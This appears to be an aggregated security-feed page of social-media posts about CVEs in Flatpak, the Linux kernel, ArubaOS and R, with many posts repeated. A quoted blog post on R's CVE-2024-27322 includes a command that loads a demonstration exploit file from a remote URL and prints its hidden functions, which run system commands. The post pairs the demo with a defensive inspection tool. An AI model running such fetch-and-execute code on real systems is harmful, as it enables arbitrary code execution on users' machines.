TheEvilSkeleton@treehouse.systems at 2024-04-29T17:37:24.000Z ##

Flatpak just received a new update 👀

New features:

  • Automatically reload D-Bus session bus configuration after installing or upgrading apps, to pick up any exported D-Bus services

Bug fixes:

  • Expand the list of environment variables that Flatpak apps do not inherit from the host system
  • Don't refuse to start apps when there is no D-Bus system bus available
  • Don't try to repeat migration of apps whose data was migrated to a new name and then deleted
  • Fix warnings from newer GLib versions
  • Always set the container environment variable
  • In flatpak ps, add xdg-desktop-portal-gnome to the list of backends we'll use to learn which apps are running in the background
  • Avoid leaking a temporary variable from /etc/profile.d/flatpak.sh into the shell environment
  • Avoid undefined behaviour of signed left-shift when storing object IDs in a hash table
  • Fix Docbook validity in documentation
  • Skip more tests when FUSE isn't available
  • Fix a misleading comment in the test for CVE-2024-32462

Internal changes:

  • Fix Github Workflows recipes

github.com/flatpak/flatpak/rel

#Flatpak #FOSS #Container #Containers #OpenSource #Sandbox

##

TheEvilSkeleton@treehouse.systems at 2024-04-29T17:37:24.000Z ##

Flatpak just received a new update 👀

New features:

  • Automatically reload D-Bus session bus configuration after installing or upgrading apps, to pick up any exported D-Bus services

Bug fixes:

  • Expand the list of environment variables that Flatpak apps do not inherit from the host system
  • Don't refuse to start apps when there is no D-Bus system bus available
  • Don't try to repeat migration of apps whose data was migrated to a new name and then deleted
  • Fix warnings from newer GLib versions
  • Always set the container environment variable
  • In flatpak ps, add xdg-desktop-portal-gnome to the list of backends we'll use to learn which apps are running in the background
  • Avoid leaking a temporary variable from /etc/profile.d/flatpak.sh into the shell environment
  • Avoid undefined behaviour of signed left-shift when storing object IDs in a hash table
  • Fix Docbook validity in documentation
  • Skip more tests when FUSE isn't available
  • Fix a misleading comment in the test for CVE-2024-32462

Internal changes:

  • Fix Github Workflows recipes

github.com/flatpak/flatpak/rel

#Flatpak #FOSS #Container #Containers #OpenSource #Sandbox

##

CVE-2024-1086
(7.8 HIGH)

EPSS: 0.04%

updated 2024-05-01T18:15:13.200000

1 posts

A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation. The nft_verdict_init() function allows positive values as drop error within the hook verdict, and hence the nf_hook_slow() function can cause a double free vulnerability when NF_DROP is issued with a drop error which resembles NF_ACCEPT. We recommend upgradi

3 repos

https://github.com/Notselwyn/CVE-2024-1086

https://github.com/CCIEVoice2009/CVE-2024-1086

https://github.com/Alicey0719/docker-POC_CVE-2024-1086

CVE-2024-33511
(9.8 CRITICAL)

EPSS: 0.04%

updated 2024-05-01T15:30:44

8 posts

There is a buffer overflow vulnerability in the underlying Automatic Reporting service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying oper

screaminggoat at 2024-05-02T14:04:02.010Z ##

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

  • CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
  • CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
  • CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
  • CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

  • ArubaOS 10.6.x.x: 10.6.0.0 and above
  • ArubaOS 10.5.x.x: 10.5.1.1 and above
  • ArubaOS 10.4.x.x: 10.4.1.1 and above
  • ArubaOS 8.11.x.x: 8.11.2.2 and above
  • ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

##

mttaggart@infosec.town at 2024-05-01T23:03:39.310Z ##

CVE-2024-33511: CVSS 9.8

There is a buffer overflow vulnerability in the underlying Automatic Reporting service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port(8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.
Again, "results in."

#CVE_2024_33511 #Aruba #ThreatIntel

##

screaminggoat@infosec.exchange at 2024-05-02T14:04:02.000Z ##

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

  • CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
  • CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
  • CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
  • CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

  • ArubaOS 10.6.x.x: 10.6.0.0 and above
  • ArubaOS 10.5.x.x: 10.5.1.1 and above
  • ArubaOS 10.4.x.x: 10.4.1.1 and above
  • ArubaOS 8.11.x.x: 8.11.2.2 and above
  • ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday

##

mttaggart@infosec.town at 2024-05-01T23:03:39.310Z ##

CVE-2024-33511: CVSS 9.8

There is a buffer overflow vulnerability in the underlying Automatic Reporting service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port(8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.
Again, "results in."

#CVE_2024_33511 #Aruba #ThreatIntel

##

screaminggoat at 2024-05-02T14:04:02.010Z ##

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

  • CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
  • CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
  • CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
  • CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

  • ArubaOS 10.6.x.x: 10.6.0.0 and above
  • ArubaOS 10.5.x.x: 10.5.1.1 and above
  • ArubaOS 10.4.x.x: 10.4.1.1 and above
  • ArubaOS 8.11.x.x: 8.11.2.2 and above
  • ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

##

mttaggart@infosec.town at 2024-05-01T23:03:39.310Z ##

CVE-2024-33511: CVSS 9.8

There is a buffer overflow vulnerability in the underlying Automatic Reporting service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port(8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.
Again, "results in."

#CVE_2024_33511 #Aruba #ThreatIntel

##

screaminggoat@infosec.exchange at 2024-05-02T14:04:02.000Z ##

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

  • CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
  • CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
  • CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
  • CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

  • ArubaOS 10.6.x.x: 10.6.0.0 and above
  • ArubaOS 10.5.x.x: 10.5.1.1 and above
  • ArubaOS 10.4.x.x: 10.4.1.1 and above
  • ArubaOS 8.11.x.x: 8.11.2.2 and above
  • ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday

##

mttaggart@infosec.town at 2024-05-01T23:03:39.310Z ##

CVE-2024-33511: CVSS 9.8

There is a buffer overflow vulnerability in the underlying Automatic Reporting service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port(8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.
Again, "results in."

#CVE_2024_33511 #Aruba #ThreatIntel

##

CVE-2024-33512
(9.8 CRITICAL)

EPSS: 0.04%

updated 2024-05-01T15:30:44

4 posts

There is a buffer overflow vulnerability in the underlying Local User Authentication Database service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the

screaminggoat at 2024-05-02T14:04:02.010Z ##

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

  • CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
  • CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
  • CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
  • CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

  • ArubaOS 10.6.x.x: 10.6.0.0 and above
  • ArubaOS 10.5.x.x: 10.5.1.1 and above
  • ArubaOS 10.4.x.x: 10.4.1.1 and above
  • ArubaOS 8.11.x.x: 8.11.2.2 and above
  • ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

##

screaminggoat@infosec.exchange at 2024-05-02T14:04:02.000Z ##

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

  • CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
  • CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
  • CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
  • CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

  • ArubaOS 10.6.x.x: 10.6.0.0 and above
  • ArubaOS 10.5.x.x: 10.5.1.1 and above
  • ArubaOS 10.4.x.x: 10.4.1.1 and above
  • ArubaOS 8.11.x.x: 8.11.2.2 and above
  • ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday

##

screaminggoat at 2024-05-02T14:04:02.010Z ##

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

  • CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
  • CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
  • CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
  • CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

  • ArubaOS 10.6.x.x: 10.6.0.0 and above
  • ArubaOS 10.5.x.x: 10.5.1.1 and above
  • ArubaOS 10.4.x.x: 10.4.1.1 and above
  • ArubaOS 8.11.x.x: 8.11.2.2 and above
  • ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

##

screaminggoat@infosec.exchange at 2024-05-02T14:04:02.000Z ##

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

  • CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
  • CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
  • CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
  • CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

  • ArubaOS 10.6.x.x: 10.6.0.0 and above
  • ArubaOS 10.5.x.x: 10.5.1.1 and above
  • ArubaOS 10.4.x.x: 10.4.1.1 and above
  • ArubaOS 8.11.x.x: 8.11.2.2 and above
  • ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday

##

CVE-2024-26304
(9.8 CRITICAL)

EPSS: 0.04%

updated 2024-05-01T15:30:37

2 posts

There is a buffer overflow vulnerability in the underlying L2/L3 Management service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operati

1 repos

https://github.com/Roud-Roud-Agency/CVE-2024-26304-RCE-exploits

screaminggoat at 2024-05-02T14:04:02.010Z ##

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

  • CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
  • CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
  • CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
  • CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

  • ArubaOS 10.6.x.x: 10.6.0.0 and above
  • ArubaOS 10.5.x.x: 10.5.1.1 and above
  • ArubaOS 10.4.x.x: 10.4.1.1 and above
  • ArubaOS 8.11.x.x: 8.11.2.2 and above
  • ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

##

screaminggoat@infosec.exchange at 2024-05-02T14:04:02.000Z ##

HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:

  • CVE-2024-26305 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol
  • CVE-2024-26304 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol
  • CVE-2024-33511 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Automatic Reporting Service Accessed via the PAPI Protocol
  • CVE-2024-33512 (9.8 critical) Unauthenticated Buffer Overflow Vulnerability in the Local User Authentication Database Accessed via the PAPI Protocol

3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:

  • ArubaOS 10.6.x.x: 10.6.0.0 and above
  • ArubaOS 10.5.x.x: 10.5.1.1 and above
  • ArubaOS 10.4.x.x: 10.4.1.1 and above
  • ArubaOS 8.11.x.x: 8.11.2.2 and above
  • ArubaOS 8.10.x.x: 8.10.0.11 and above

They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS

#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday

##

CVE-2024-27322
(8.8 HIGH)

EPSS: 0.04%

updated 2024-04-29T21:30:34

28 posts

Deserialization of untrusted data can occur in the R statistical programming language, on any version starting at 1.4.0 up to and not including 4.4.0, enabling a maliciously crafted RDS (R Data Serialization) formatted file or R package to run arbitrary code on an end user’s system when interacted with.

jos1264@social.skynetcloud.site at 2024-04-30T14:30:04.000Z ##

Vulnerability in R Programming Language Could Fuel Supply Chain Attacks securityweek.com/vulnerability #Vulnerabilities #vulnerability #CVE202427322 #Featured

##

jos1264@social.skynetcloud.site at 2024-04-30T14:30:03.000Z ##

Vulnerability in R Programming Language Could Fuel Supply Chain Attacks securityweek.com/vulnerability #Vulnerabilities #vulnerability #CVE202427322 #Featured

##

screaminggoat at 2024-05-01T19:01:25.313Z ##

CISA: CERT/CC Reports R Programming Language Vulnerability
I ignored this one but even CISA thinks it's worth mentioning: CVE-2024-27322 (8.8 high) Deserialization of untrusted data in R statistical programming language could allow for arbitrary code execution. A cyber threat actor could exploit this vulnerability to take control of an affected system.
Direct link to CERT/CC advisory.

##

screaminggoat@infosec.exchange at 2024-05-01T19:01:25.000Z ##

CISA: CERT/CC Reports R Programming Language Vulnerability
I ignored this one but even CISA thinks it's worth mentioning: CVE-2024-27322 (8.8 high) Deserialization of untrusted data in R statistical #Rstats programming language could allow for arbitrary code execution. A cyber threat actor could exploit this vulnerability to take control of an affected system.
Direct link to CERT/CC advisory.

#vulnerability #CVE_2024_27322

##

screaminggoat at 2024-05-01T19:01:25.313Z ##

CISA: CERT/CC Reports R Programming Language Vulnerability
I ignored this one but even CISA thinks it's worth mentioning: CVE-2024-27322 (8.8 high) Deserialization of untrusted data in R statistical programming language could allow for arbitrary code execution. A cyber threat actor could exploit this vulnerability to take control of an affected system.
Direct link to CERT/CC advisory.

##

screaminggoat@infosec.exchange at 2024-05-01T19:01:25.000Z ##

CISA: CERT/CC Reports R Programming Language Vulnerability
I ignored this one but even CISA thinks it's worth mentioning: CVE-2024-27322 (8.8 high) Deserialization of untrusted data in R statistical #Rstats programming language could allow for arbitrary code execution. A cyber threat actor could exploit this vulnerability to take control of an affected system.
Direct link to CERT/CC advisory.

#vulnerability #CVE_2024_27322

##

jos1264@social.skynetcloud.site at 2024-05-03T16:10:04.000Z ##

CVE-2024-27322 Should Never Have Been Assigned And R Data Files Are Still Super Risky Even In R 4.4.0 – Source: securityboulevard.com ciso2ciso.com/cve-2024-27322-s #rssfeedpostgeneratorecho #SecurityBloggersNetwork #CyberSecurityNews #SecurityBoulevard #R

##

hrbrmstr@mastodon.social at 2024-05-03T10:36:57.000Z ##

I ended up having to burn time I honestly don't have this week to blog the stuff from the repo I made yesterday due to CERT and CISA making a big deal (cisa.gov/news-events/alerts/20) out of expected behavior in #RStats due to a daft, hype-seeking vendor.

The profession that is cybersecurity is stupid broken.

I rly want (someone) to pwn an org with this CVE just to get it on KEV for sad posterity.

rud.is/b/2024/05/03/cve-2024-2

##

hrbrmstr@rud.is at 2024-05-03T10:12:52.000Z ##

I had not planned to blog this (this is an incredibly time-crunched week for me) but CERT/CC and CISA made a big deal out of a non-vulnerability in R, and it’s making the round on socmed, so here we are.

A security vendor decided to try to get some hype before 2024 RSAC and made a big deal out of what was/is known expected behavior in R data files. R Core took some measures to address the issue they outlined, but for the love of Henry, PLEASE do not think R data files are safe to handle if you weren’t the one creating them, or you do not fully know the provenance of them.

Konrad Rudolph and Iakov Davydov did some ace cyber sleuthing and figured out other ways R data file deserialization can be abused. Please take a moment and drop a note on Mastodon to them saying “thank you”. This is excellent work. We need more folks like them in this ecosystem.

Like many programming languages, R has many footguns, and R data files are one of them. R objects are wonderful beasts, and being able to serialize and deserialize those beasts is a super helpful bit of functionality. Also, R has something called active bindings. Amongst other things, they let you access an object to get a value, but — in doing so — code can get executed without you knowing it. Whether an R data file has an object with active bindings or not, it can be abused by attackers.

When you load() an R data file directly into your R session and into the global environment, the object(s) in it will, well, load there. So, if it has an object named print that’s going to be in your global environment and get called when print() gets called. Lather/rinse/repeat for any other object name. It should be pretty obvious how this could be abused.

A tad more insidious is what happens when you quit R. By default, on quit(), unless you specify otherwise, that function invocation will also call .Last() if it exists in the environment. This functionality exists in the event things need to be cleaned up. One “nice” aspect of .-prefixed R objects is that they’re hidden by default from the environment. So, you may not even notice if an R data file you’ve loaded has that defined. (You likely do not check what’s loaded anyway.)

It’s also possible to create custom R objects that have their own “finalizers” (ref reg.finalizer), which will also get called by default when the objects are being destroyed on quit.

There are also likely other ways to trigger unwanted behavior.

If you want to see how this works, start R from RStudio, the command line, or R GUI. Then, execute the following R code:

load(url("https://github.com/hrbrmstr/rdaradar/raw/main/exploit.rda"))

Then, quit R/RStudio/R GUI (this will be less dramatic on linux, but the demo should still be effective).

If you must take in untrusted R data files, keep reading.

I threw together an R script along with a safer way to use it (a Docker container) to help R folks inspect the contents of R data files before actually using them. It also looks for some basic shady stuff and alerts you if it finds them. It’s a WIP, and issues + thoughtful PRs are welcome.

If one were to run Rscript check.R from that repo with that exploit.rda file as a parameter, one would see this:

-----------------------------------------------Loading R data file in quarantined environment…-----------------------------------------------Loading objects:  .Last  quit-----------------------------------------Enumerating objects in loaded R data file-----------------------------------------.Last : function (...)   - attr(*, "srcref")= 'srcref' int [1:8] 1 13 6 1 13 1 1 6  ..- attr(*, "srcfile")=Classes 'srcfilecopy', 'srcfile' <environment: 0x12cb25f48> quit : function (...)   - attr(*, "srcref")= 'srcref' int [1:8] 1 13 6 1 13 1 1 6  ..- attr(*, "srcfile")=Classes 'srcfilecopy', 'srcfile' <environment: 0x12cb25f48> ------------------------------------Functions found: enumerating sources------------------------------------Checking `.Last`…!! `.Last` may execute arbitrary code on your system under certain conditions !!`.Last` source:{    cmd = if (.Platform$OS.type == "windows")         "calc.exe"    else if (grepl("^darwin", version$os))         "open -a Calculator.app"    else "echo pwned\\!"    system(cmd)}Checking `quit`…!! `quit` may execute arbitrary code on your system under certain conditions !!`quit` source:{    cmd = if (.Platform$OS.type == "windows")         "calc.exe"    else if (grepl("^darwin", version$os))         "open -a Calculator.app"    else "echo pwned\\!"    system(cmd)}

There’s info in the repo on how to use that with Docker.

FIN

The big takeaway is (again) to not trust R data files you did not create or know the full provenance of. If you have an internet-facing Shiny app or Plumber API that takes R data files as input, get it off the internet and figure out some other way to take in the input.

While I fully disagree with the assignment of the CVE, I’m at least glad this situation brought attention to this very dangerous aspect of handling this type of file format in R.

https://rud.is/b/2024/05/03/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0/

##

jbhall56 at 2024-05-01T12:13:40.438Z ##

The vulnerability, tagged CVE-2024-27322, can be exploited by tricking someone into loading a maliciously crafted RDS (R Data Serialization) file into an R-based project, or by fooling them into integrating a poisoned R package into a code base. theregister.com/2024/05/01/r_p

##

sublimer@mstdn.sublimer.me at 2024-05-01T10:12:42.000Z ##

JVNVU#96606632: Rプログラミング言語の実装において、安全でないデータのデシリアライゼーションが発生する問題(CVE-2024-27322) : 👀
---
jvn.jp/vu/JVNVU96606632/

##

andi@sciences.social at 2024-05-01T07:00:32.000Z ##

A vulnerability (CVE-2024-27322) has been found in R versions 1.4.0 to 4.3.3. It's patched in 4.4.0 (24 April 2024), so you will be wanting to upgrade. #RStats
kb.cert.org/vuls/id/238194

##

klmr@mastodon.social at 2024-04-30T21:50:52.000Z ##

@hrbrmstr @joranelias @Lluis_Revilla @brodriguesco @idavydov Right, it’s as much “expected behaviour” as in CVE-2024-27322, and as in other serialisation engines (e.g. Python pickle, .net BinaryFormatter, etc.). Which are all systems that are very hard to use correctly, and cause frequent direct vulnerabilities. Whether that makes the serialisation frameworks themselves a vulnerability… 🤷

(I did not register a CVE; for me this is an issue of awareness and documentation.)

##

median_headroom at 2024-04-30T19:05:18.329Z ##

@klmr @Lluis_Revilla I do agree that if you exploit a bug in the RDS parser and cause code execution this way, that's a terrible bug that must be fixed ASAP. But you can also, besides unserializing a promise, unserialize a lot of other well-formed things that would execute code upon being evaluated or printed, and that's R working by design. CVE-2024-27322 does not overflow stack or use-after-free in the parser, it just unserializes a promise. R's lazy evaluation relies on promises being serializable.

It would be great to have a safe (un-)serialization function, but the current system by itself doesn't deserve a CVE.

##

AAKL at 2024-04-30T13:38:49.983Z ##

CVE-2024-27322, if you missed this:.

